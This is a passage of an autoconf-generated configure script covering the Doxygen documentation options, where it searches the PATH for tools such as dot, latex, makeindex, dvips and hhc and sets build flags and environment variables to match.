WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_PERL=$ac_pt_DX_PERL fi else DX_PERL="$ac_cv_path_DX_PERL" fi if test "$DX_FLAG_doc$DX_PERL" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: perl not found - will not generate any doxygen documentation" >&5 $as_echo "$as_me: WARNING: perl not found - will not generate any doxygen documentation" >&2;} DX_FLAG_doc=0 fi : fi if test "$DX_FLAG_doc" = 1; then DX_COND_doc_TRUE= DX_COND_doc_FALSE='#' else DX_COND_doc_TRUE='#' DX_COND_doc_FALSE= fi if test "$DX_FLAG_doc" = 1; then DX_ENV="$DX_ENV PERL_PATH='$DX_PERL'" : else : fi # Dot for graphics: # Check whether --enable-doxygen-dot was given. if test "${enable_doxygen_dot+set}" = set; then : enableval=$enable_doxygen_dot; case "$enableval" in #( y|Y|yes|Yes|YES) DX_FLAG_dot=1 test "$DX_FLAG_doc" = "1" \ || as_fn_error $? "doxygen-dot requires doxygen-dot" "$LINENO" 5 ;; #( n|N|no|No|NO) DX_FLAG_dot=0 ;; #( *) as_fn_error $? "invalid value '$enableval' given to doxygen-dot" "$LINENO" 5 ;; esac else DX_FLAG_dot=0 test "$DX_FLAG_doc" = "1" || DX_FLAG_dot=0 fi if test "$DX_FLAG_dot" = 1; then if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}dot", so it can be a program name with args. set dummy ${ac_tool_prefix}dot; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_DOT+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_DOT in [\\/]* | ?:[\\/]*) ac_cv_path_DX_DOT="$DX_DOT" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_DOT="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_DOT=$ac_cv_path_DX_DOT if test -n "$DX_DOT"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_DOT" >&5 $as_echo "$DX_DOT" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_DOT"; then ac_pt_DX_DOT=$DX_DOT # Extract the first word of "dot", so it can be a program name with args. set dummy dot; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_DOT+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_DOT in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_DOT="$ac_pt_DX_DOT" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_DOT="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_DOT=$ac_cv_path_ac_pt_DX_DOT if test -n "$ac_pt_DX_DOT"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_DOT" >&5 $as_echo "$ac_pt_DX_DOT" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_DOT" = x; then DX_DOT="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_DOT=$ac_pt_DX_DOT fi else DX_DOT="$ac_cv_path_DX_DOT" fi if test "$DX_FLAG_dot$DX_DOT" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: dot not found - will not generate graphics for doxygen documentation" >&5 $as_echo "$as_me: WARNING: dot not found - will not generate graphics for doxygen documentation" >&2;} DX_FLAG_dot=0 fi : fi if test "$DX_FLAG_dot" = 1; then DX_COND_dot_TRUE= DX_COND_dot_FALSE='#' else DX_COND_dot_TRUE='#' DX_COND_dot_FALSE= fi if test "$DX_FLAG_dot" = 1; then DX_ENV="$DX_ENV HAVE_DOT='YES'" DX_ENV="$DX_ENV DOT_PATH='`expr ".$DX_DOT" : '\(\.\)[^/]*$' \| "x$DX_DOT" : 'x\(.*\)/[^/]*$'`'" : else DX_ENV="$DX_ENV HAVE_DOT='NO'" : fi # Man pages generation: # Check whether --enable-doxygen-man was given. if test "${enable_doxygen_man+set}" = set; then : enableval=$enable_doxygen_man; case "$enableval" in #( y|Y|yes|Yes|YES) DX_FLAG_man=1 test "$DX_FLAG_doc" = "1" \ || as_fn_error $? "doxygen-man requires doxygen-man" "$LINENO" 5 ;; #( n|N|no|No|NO) DX_FLAG_man=0 ;; #( *) as_fn_error $? "invalid value '$enableval' given to doxygen-man" "$LINENO" 5 ;; esac else DX_FLAG_man=0 test "$DX_FLAG_doc" = "1" || DX_FLAG_man=0 fi if test "$DX_FLAG_man" = 1; then : fi if test "$DX_FLAG_man" = 1; then DX_COND_man_TRUE= DX_COND_man_FALSE='#' else DX_COND_man_TRUE='#' DX_COND_man_FALSE= fi if test "$DX_FLAG_man" = 1; then DX_ENV="$DX_ENV GENERATE_MAN='YES'" : else DX_ENV="$DX_ENV GENERATE_MAN='NO'" : fi # RTF file generation: # Check whether --enable-doxygen-rtf was given. if test "${enable_doxygen_rtf+set}" = set; then : enableval=$enable_doxygen_rtf; case "$enableval" in #( y|Y|yes|Yes|YES) DX_FLAG_rtf=1 test "$DX_FLAG_doc" = "1" \ || as_fn_error $? "doxygen-rtf requires doxygen-rtf" "$LINENO" 5 ;; #( n|N|no|No|NO) DX_FLAG_rtf=0 ;; #( *) as_fn_error $? "invalid value '$enableval' given to doxygen-rtf" "$LINENO" 5 ;; esac else DX_FLAG_rtf=0 test "$DX_FLAG_doc" = "1" || DX_FLAG_rtf=0 fi if test "$DX_FLAG_rtf" = 1; then : fi if test "$DX_FLAG_rtf" = 1; then DX_COND_rtf_TRUE= DX_COND_rtf_FALSE='#' else DX_COND_rtf_TRUE='#' DX_COND_rtf_FALSE= fi if test "$DX_FLAG_rtf" = 1; then DX_ENV="$DX_ENV GENERATE_RTF='YES'" : else DX_ENV="$DX_ENV GENERATE_RTF='NO'" : fi # XML file generation: # Check whether --enable-doxygen-xml was given. if test "${enable_doxygen_xml+set}" = set; then : enableval=$enable_doxygen_xml; case "$enableval" in #( y|Y|yes|Yes|YES) DX_FLAG_xml=1 test "$DX_FLAG_doc" = "1" \ || as_fn_error $? "doxygen-xml requires doxygen-xml" "$LINENO" 5 ;; #( n|N|no|No|NO) DX_FLAG_xml=0 ;; #( *) as_fn_error $? "invalid value '$enableval' given to doxygen-xml" "$LINENO" 5 ;; esac else DX_FLAG_xml=0 test "$DX_FLAG_doc" = "1" || DX_FLAG_xml=0 fi if test "$DX_FLAG_xml" = 1; then : fi if test "$DX_FLAG_xml" = 1; then DX_COND_xml_TRUE= DX_COND_xml_FALSE='#' else DX_COND_xml_TRUE='#' DX_COND_xml_FALSE= fi if test "$DX_FLAG_xml" = 1; then DX_ENV="$DX_ENV GENERATE_XML='YES'" : else DX_ENV="$DX_ENV GENERATE_XML='NO'" : fi # (Compressed) HTML help generation: # Check whether --enable-doxygen-chm was given. if test "${enable_doxygen_chm+set}" = set; then : enableval=$enable_doxygen_chm; case "$enableval" in #( y|Y|yes|Yes|YES) DX_FLAG_chm=1 test "$DX_FLAG_doc" = "1" \ || as_fn_error $? "doxygen-chm requires doxygen-chm" "$LINENO" 5 ;; #( n|N|no|No|NO) DX_FLAG_chm=0 ;; #( *) as_fn_error $? "invalid value '$enableval' given to doxygen-chm" "$LINENO" 5 ;; esac else DX_FLAG_chm=0 test "$DX_FLAG_doc" = "1" || DX_FLAG_chm=0 fi if test "$DX_FLAG_chm" = 1; then if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}hhc", so it can be a program name with args. set dummy ${ac_tool_prefix}hhc; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_HHC+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_HHC in [\\/]* | ?:[\\/]*) ac_cv_path_DX_HHC="$DX_HHC" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_HHC="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_HHC=$ac_cv_path_DX_HHC if test -n "$DX_HHC"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_HHC" >&5 $as_echo "$DX_HHC" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_HHC"; then ac_pt_DX_HHC=$DX_HHC # Extract the first word of "hhc", so it can be a program name with args. set dummy hhc; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_HHC+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_HHC in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_HHC="$ac_pt_DX_HHC" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_HHC="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_HHC=$ac_cv_path_ac_pt_DX_HHC if test -n "$ac_pt_DX_HHC"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_HHC" >&5 $as_echo "$ac_pt_DX_HHC" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_HHC" = x; then DX_HHC="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_HHC=$ac_pt_DX_HHC fi else DX_HHC="$ac_cv_path_DX_HHC" fi if test "$DX_FLAG_chm$DX_HHC" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: hhc not found - will not generate doxygen compressed HTML help documentation" >&5 $as_echo "$as_me: WARNING: hhc not found - will not generate doxygen compressed HTML help documentation" >&2;} DX_FLAG_chm=0 fi : fi if test "$DX_FLAG_chm" = 1; then DX_COND_chm_TRUE= DX_COND_chm_FALSE='#' else DX_COND_chm_TRUE='#' DX_COND_chm_FALSE= fi if test "$DX_FLAG_chm" = 1; then DX_ENV="$DX_ENV HHC_PATH='$DX_HHC'" DX_ENV="$DX_ENV GENERATE_HTML='YES'" DX_ENV="$DX_ENV GENERATE_HTMLHELP='YES'" : else DX_ENV="$DX_ENV GENERATE_HTMLHELP='NO'" : fi # Seperate CHI file generation. # Check whether --enable-doxygen-chi was given. if test "${enable_doxygen_chi+set}" = set; then : enableval=$enable_doxygen_chi; case "$enableval" in #( y|Y|yes|Yes|YES) DX_FLAG_chi=1 test "$DX_FLAG_chm" = "1" \ || as_fn_error $? "doxygen-chi requires doxygen-chi" "$LINENO" 5 ;; #( n|N|no|No|NO) DX_FLAG_chi=0 ;; #( *) as_fn_error $? "invalid value '$enableval' given to doxygen-chi" "$LINENO" 5 ;; esac else DX_FLAG_chi=0 test "$DX_FLAG_chm" = "1" || DX_FLAG_chi=0 fi if test "$DX_FLAG_chi" = 1; then : fi if test "$DX_FLAG_chi" = 1; then DX_COND_chi_TRUE= DX_COND_chi_FALSE='#' else DX_COND_chi_TRUE='#' DX_COND_chi_FALSE= fi if test "$DX_FLAG_chi" = 1; then DX_ENV="$DX_ENV GENERATE_CHI='YES'" : else DX_ENV="$DX_ENV GENERATE_CHI='NO'" : fi # Plain HTML pages generation: # Check whether --enable-doxygen-html was given. if test "${enable_doxygen_html+set}" = set; then : enableval=$enable_doxygen_html; case "$enableval" in #( y|Y|yes|Yes|YES) DX_FLAG_html=1 test "$DX_FLAG_doc" = "1" \ || as_fn_error $? "doxygen-html requires doxygen-html" "$LINENO" 5 test "$DX_FLAG_chm" = "0" \ || as_fn_error $? "doxygen-html contradicts doxygen-html" "$LINENO" 5 ;; #( n|N|no|No|NO) DX_FLAG_html=0 ;; #( *) as_fn_error $? "invalid value '$enableval' given to doxygen-html" "$LINENO" 5 ;; esac else DX_FLAG_html=1 test "$DX_FLAG_doc" = "1" || DX_FLAG_html=0 test "$DX_FLAG_chm" = "0" || DX_FLAG_html=0 fi if test "$DX_FLAG_html" = 1; then : fi if test "$DX_FLAG_html" = 1; then DX_COND_html_TRUE= DX_COND_html_FALSE='#' else DX_COND_html_TRUE='#' DX_COND_html_FALSE= fi if test "$DX_FLAG_html" = 1; then DX_ENV="$DX_ENV GENERATE_HTML='YES'" : else test "$DX_FLAG_chm" = 1 || DX_ENV="$DX_ENV GENERATE_HTML='NO'" : fi # PostScript file generation: # Check whether --enable-doxygen-ps was given. if test "${enable_doxygen_ps+set}" = set; then : enableval=$enable_doxygen_ps; case "$enableval" in #( y|Y|yes|Yes|YES) DX_FLAG_ps=1 test "$DX_FLAG_doc" = "1" \ || as_fn_error $? "doxygen-ps requires doxygen-ps" "$LINENO" 5 ;; #( n|N|no|No|NO) DX_FLAG_ps=0 ;; #( *) as_fn_error $? "invalid value '$enableval' given to doxygen-ps" "$LINENO" 5 ;; esac else DX_FLAG_ps=0 test "$DX_FLAG_doc" = "1" || DX_FLAG_ps=0 fi if test "$DX_FLAG_ps" = 1; then if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}latex", so it can be a program name with args. set dummy ${ac_tool_prefix}latex; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_LATEX+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_LATEX in [\\/]* | ?:[\\/]*) ac_cv_path_DX_LATEX="$DX_LATEX" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_LATEX="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_LATEX=$ac_cv_path_DX_LATEX if test -n "$DX_LATEX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_LATEX" >&5 $as_echo "$DX_LATEX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_LATEX"; then ac_pt_DX_LATEX=$DX_LATEX # Extract the first word of "latex", so it can be a program name with args. set dummy latex; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_LATEX+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_LATEX in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_LATEX="$ac_pt_DX_LATEX" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_LATEX="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_LATEX=$ac_cv_path_ac_pt_DX_LATEX if test -n "$ac_pt_DX_LATEX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_LATEX" >&5 $as_echo "$ac_pt_DX_LATEX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_LATEX" = x; then DX_LATEX="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_LATEX=$ac_pt_DX_LATEX fi else DX_LATEX="$ac_cv_path_DX_LATEX" fi if test "$DX_FLAG_ps$DX_LATEX" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: latex not found - will not generate doxygen PostScript documentation" >&5 $as_echo "$as_me: WARNING: latex not found - will not generate doxygen PostScript documentation" >&2;} DX_FLAG_ps=0 fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}makeindex", so it can be a program name with args. set dummy ${ac_tool_prefix}makeindex; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_MAKEINDEX+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_MAKEINDEX in [\\/]* | ?:[\\/]*) ac_cv_path_DX_MAKEINDEX="$DX_MAKEINDEX" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_MAKEINDEX="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_MAKEINDEX=$ac_cv_path_DX_MAKEINDEX if test -n "$DX_MAKEINDEX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_MAKEINDEX" >&5 $as_echo "$DX_MAKEINDEX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_MAKEINDEX"; then ac_pt_DX_MAKEINDEX=$DX_MAKEINDEX # Extract the first word of "makeindex", so it can be a program name with args. set dummy makeindex; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_MAKEINDEX+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_MAKEINDEX in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_MAKEINDEX="$ac_pt_DX_MAKEINDEX" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_MAKEINDEX="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_MAKEINDEX=$ac_cv_path_ac_pt_DX_MAKEINDEX if test -n "$ac_pt_DX_MAKEINDEX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_MAKEINDEX" >&5 $as_echo "$ac_pt_DX_MAKEINDEX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_MAKEINDEX" = x; then DX_MAKEINDEX="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_MAKEINDEX=$ac_pt_DX_MAKEINDEX fi else DX_MAKEINDEX="$ac_cv_path_DX_MAKEINDEX" fi if test "$DX_FLAG_ps$DX_MAKEINDEX" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: makeindex not found - will not generate doxygen PostScript documentation" >&5 $as_echo "$as_me: WARNING: makeindex not found - will not generate doxygen PostScript documentation" >&2;} DX_FLAG_ps=0 fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}dvips", so it can be a program name with args. set dummy ${ac_tool_prefix}dvips; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_DVIPS+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_DVIPS in [\\/]* | ?:[\\/]*) ac_cv_path_DX_DVIPS="$DX_DVIPS" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_DVIPS="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_DVIPS=$ac_cv_path_DX_DVIPS if test -n "$DX_DVIPS"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_DVIPS" >&5 $as_echo "$DX_DVIPS" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_DVIPS"; then ac_pt_DX_DVIPS=$DX_DVIPS # Extract the first word of "dvips", so it can be a program name with args. set dummy dvips; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_DVIPS+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_DVIPS in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_DVIPS="$ac_pt_DX_DVIPS" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_DVIPS="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_DVIPS=$ac_cv_path_ac_pt_DX_DVIPS if test -n "$ac_pt_DX_DVIPS"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_DVIPS" >&5 $as_echo "$ac_pt_DX_DVIPS" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_DVIPS" = x; then DX_DVIPS="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_DVIPS=$ac_pt_DX_DVIPS fi else DX_DVIPS="$ac_cv_path_DX_DVIPS" fi if test "$DX_FLAG_ps$DX_DVIPS" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: dvips not found - will not generate doxygen PostScript documentation" >&5 $as_echo "$as_me: WARNING: dvips not found - will not generate doxygen PostScript documentation" >&2;} DX_FLAG_ps=0 fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}egrep", so it can be a program name with args. set dummy ${ac_tool_prefix}egrep; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_EGREP+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_EGREP in [\\/]* | ?:[\\/]*) ac_cv_path_DX_EGREP="$DX_EGREP" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_EGREP="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_EGREP=$ac_cv_path_DX_EGREP if test -n "$DX_EGREP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_EGREP" >&5 $as_echo "$DX_EGREP" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_EGREP"; then ac_pt_DX_EGREP=$DX_EGREP # Extract the first word of "egrep", so it can be a program name with args. set dummy egrep; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_EGREP+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_EGREP in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_EGREP="$ac_pt_DX_EGREP" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_EGREP="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_EGREP=$ac_cv_path_ac_pt_DX_EGREP if test -n "$ac_pt_DX_EGREP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_EGREP" >&5 $as_echo "$ac_pt_DX_EGREP" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_EGREP" = x; then DX_EGREP="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_EGREP=$ac_pt_DX_EGREP fi else DX_EGREP="$ac_cv_path_DX_EGREP" fi if test "$DX_FLAG_ps$DX_EGREP" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: egrep not found - will not generate doxygen PostScript documentation" >&5 $as_echo "$as_me: WARNING: egrep not found - will not generate doxygen PostScript documentation" >&2;} DX_FLAG_ps=0 fi : fi if test "$DX_FLAG_ps" = 1; then DX_COND_ps_TRUE= DX_COND_ps_FALSE='#' else DX_COND_ps_TRUE='#' DX_COND_ps_FALSE= fi if test "$DX_FLAG_ps" = 1; then : else : fi # PDF file generation: # Check whether --enable-doxygen-pdf was given. if test "${enable_doxygen_pdf+set}" = set; then : enableval=$enable_doxygen_pdf; case "$enableval" in #( y|Y|yes|Yes|YES) DX_FLAG_pdf=1 test "$DX_FLAG_doc" = "1" \ || as_fn_error $? "doxygen-pdf requires doxygen-pdf" "$LINENO" 5 ;; #( n|N|no|No|NO) DX_FLAG_pdf=0 ;; #( *) 